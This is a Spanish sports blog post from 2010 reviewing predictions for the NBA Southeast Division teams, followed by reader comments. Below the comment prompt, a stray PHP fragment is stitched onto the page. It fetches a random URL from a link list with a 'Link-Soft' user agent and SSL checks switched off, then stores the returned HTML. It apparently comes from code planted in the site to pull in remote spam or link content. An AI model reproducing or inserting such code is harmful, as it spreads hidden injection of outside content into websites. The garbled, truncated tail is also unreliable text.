Revisando pronósticos t2010: Southeast

22 de February de 2010 por TheDeerHunter

Orlando Magic: Hay una cosa que para mí sí está clara. Con una plantilla sobre el papel tan potente como la de los Magic no han logrado ni imponerse en el Este ni mostrar una regularidad acorde a sus objetivos. Sí ha mostrado puntas de juego bastante interesantes pero se ha visto que un exceso de recursos y opciones no es garantía de superioridad. Garnett efectivamente parece lesionado… pero ni antes de la fecha fin de traspasos ni mucho menos ahora, por como se han movido otros, se vislumbra un camino fácil para los Magic hacia la final que prometíamos.

Lo mejor: Alrededor de la tremenda figura de Dwight Howard no es difícil implementar un juego sólido, sobre todo con los mimbres que hay a su alrededor. Carter está supliendo bien a Turkoglu, aunque tampoco supera las prestaciones que dio el turco.

Lo peor: A menudo se les olvida que Howard es el eje de esto. No se han librado del tufillo de ir a por Van Gundy a pesar de que se ha comido sobradamente los turrones en contra de lo que apostaban algunos. Rashard Lewis y Nelson no terminan de despertar este curso.

Atlanta Hawks: Lanzábamos varias premisas que debían cumplirse para encontrar el salto de calidad necesario para toser a los otros tres grandes del Este. No es por colgarnos medallas pero aquel análisis parece premonitorio y algunas de ellas sí se han cumplido con el consiguiente aumento de nivel de los Hawks. Han mostrado cierta irregularidad… pero cuidado con ellos en cualquier cruce de playoffs. Les dimos 2ª ronda. Lo mismo nos quedamos cortos.

Lo mejor: Parece que Jamal Crawford ha encontrado por fin su sitio en el mundo. Candidato claro a mejor 6º hombre y mejor fichaje del verano. El resto de halcones también está rindiendo a buen nivel.

Lo peor: Algunos momentos de desconcierto y la sensación de que, con todo, su techo no va mucho más allá de 2ª ronda.

Miami Heat: Tan complicado el análisis de los Heat como la montaña rusa de temporada que está siendo para ellos. Y sin embargo ya lo preveíamos. “Carne de primera ronda y gracias” Ya la pueden dar si la alcanzan porque por momentos han bailado al borde del abismo. Está claro que llegarán donde les Wade les lleve, porque no nos queremos ni imaginar qué sería de ellos sin el esforzado Flash. Quizá lo sepamos el curso que viene.

Lo mejor: Wade, Wade y Wade… pero este año no está siendo tan demoledor como el pasado. Algún día también Beasley si le pilla a buenas, pero no es frecuente.

Lo peor: Que cierto super-hombre se va a cansar pronto de llevar a toda una banda en la chepa para llegar a ningún sitio.

Charlote Bobcats: Tiene toda la pinta de que vamos de camino a patinazo en nuestra apuesta. Los Bobcats marchan (relativamente) sólidos hacia postemporada, aunque buena culpa de ello tiene el “imprevisto” fichaje de Stephen Jackson y el rendimiento superlativo de Wallace. La defensa de Larry Brown sigue siendo una gran baza pero seguimos sin entender algunos conceptos como la supuesta animadversión hacia Mohammed que está siendo el pívot que les está salvando el culo. Se dice que buscaban un traspaso.

Lo mejor: Larry brown ha encontrado al mismo tiempo perros de presa y talento en Jackson y Wallace. Su sistema sigue funcionando a través de las décadas…

Lo peor: Una lástima lo de Chandler hasta el momento. Posiblemente con él las opciones de este equipo todavía mejoren. Son un hueso duro que algún ilustre le tocará roer.

Washington Wizards: Para patinazo el de los Wizards, el día que firmaron la primera extensión de contrato a Arenas. La incógnita que queríamos resolver se ha despejado con graves sucesos con armas de por medio y el resultado de tanto dinero y energías malgastadas en el Agente Zero es la mayor ruina que una puede imaginar, con la súbita reconstrucción del equipo. Suerte han tenido algunos de subirse a las lanchas de salvamento.

Lo mejor: La industria armamentística-comercial norteamericana, que funciona bien gracias a este tipo de chusma.

Lo peor: La anormalidad de algunos y el que esto no termina aquí.

Comenta

8 comentarios a esta entrada

  1. sergio dice:
    #1

    Sin duda alguna, la division mas salvaje del Este. No lo he oido comentar mucho pero creo que los fichajes de los Bobcats le otorgan a Larry Brown las herramientas que necesitaba. Thomas y Ratliff vienen a dar, respectivamente, puntos y defensa, algo de lo que estaba necesitado en el puesto de pivot.

    Para mi, salvo Cavs y Orlando, nadie tiene el puesto asegurado en 2ª ronda de Playoffs del Este. E incluso un Bobcats-Cavs me pareceria un duelo muy interesante…

      Citar

  2. sayim dice:
    #2

    para mi en un bobcats-cavs la duda es si sera 4-0 o 4-1 y si lebron promediara 30 min por noche

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    Thomas,,como proyecto y tal bien,,,,una mala bestia potencial,,pero para mi se queda en potencial todo lo de Thomas.

      Citar

  4. Love Denise dice:
    #4

    Continuo pensando que los magic son el mejor equipo de la NBA de largo, y parece que SVGundy ya ha encontrado (ya era hora¡¡¡¡) el esquema adecuado con un Lewis empieza a enchufarlas de tres, Carter últimamente no se tira mandarinas y Howard domina en la zona.

      Citar

  5. Viva_Dirk dice:
    #5

    Yo mantengo mi pronóstico a pesar del fichaje de Jamison, solo unos Celtics al 100% me parecen mas favoritos que los Magics, aunque no me parecen el mejor equipo de la NBA.

      Citar

  6. HeiNeKeN dice:
    #6

    Pues Josh Howard esta roto, baja para toda la temporada por rotura del ligamento cruzado anterior de la rodilla izquierda…. me lo parece a mi… o los Wizards son gafes xD.

    En mi opinion… Orlando-Boston sera la final del Este.

      Citar

  7. Txusma dice:
    #7

    Bueno, no creo que esperaran mucho los Wizards de Josh Howard que además es un expiring. En Washington ya piensan más en John Wall que en otra cosa.

      Citar

  8. sayim dice:
    #8

    No entiendo la poca confianza que tiene la gente en estos Cavs… A mi el ficheje de Jamison (siendo un extraordinario jugador) no me acaba de convencer, pero siendo realistas no me imagino a este equipo fuera de la final de conferencia y me cuesta mucho imaginarmelo fuera de las finales

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>